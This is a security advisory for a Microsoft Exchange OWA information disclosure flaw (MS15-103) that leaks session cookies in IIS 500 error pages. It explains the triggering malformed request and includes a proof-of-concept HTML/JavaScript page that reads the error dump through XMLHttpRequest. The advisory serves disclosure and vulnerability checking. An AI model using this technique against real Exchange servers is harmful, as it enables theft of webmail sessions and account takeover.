SSD Advisory – Microsoft Exchange Server Information Disclosure Proof of Concept (MS15-103)

 
Introduction
A security vulnerability in Microsoft Exchange has been discovered that allows attackers to cause the server to return the cookie information inside the HTML response.
This would allow an attacker to use Javascript to access, the otherwise inaccessible, cookie information and utilize this information to login to an active Exchange Server’s OWA web mail based session.
The information about how to fix this vulnerability has been disclosed here:
Vulnerabilities in Microsoft Exchange Server Could Allow Information Disclosure (3089250)
However, until now we have not seen any technical description of the vulnerability or how to verify whether you are or not vulnerable without checking for the patch’s existence.
We believe, we cannot be 100% sure, that this vulnerability has been addressed in Microsoft’s patch for CVE-2015-2505.
We were in the process of purchasing this vulnerability for our SecuriTeam Secure Disclosure program, when this advisory came out. So we decided to go ahead and release the information after giving Microsoft’s customers a grace period to deploy this patch.

Technical Details
The vulnerability occurs when using a malformed request which triggers from the IIS Server a “500 Internal Server Error”.
The triggering data is a simple malformed request such as /owa/service.svc/AAAA. This would cause the IIS server to dump a lot of debug data back to the user, which includes HTTP server headers, as well as the HTTP cookie.
owa_service_svc_error
You can obtain the cookie through use of a XMLHTTPRequest and an HTTP request sent to the affected OWA server:

To get this dump you can use XMLHttpRequest, Remember that for it if the owa go to https the “steal site” too. This is to prevent mixzone.
<html>
 <head>
  <script type="text/javascript">
   function readFile(url) {
    pageRequest = new XMLHttpRequest()
    pageRequest.open("GET", url, false);
    pageRequest.send(null);
    return pageRequest.responseText;
   }
  </script>
 </head>
 <body>
  <script type="text/javascript">
   txt = readFile("https://webmail.aaaaaa.com.ar/owa/service.svc/a");
   document.write(txt);
   alert(2);
  </script>
 </body>
</html>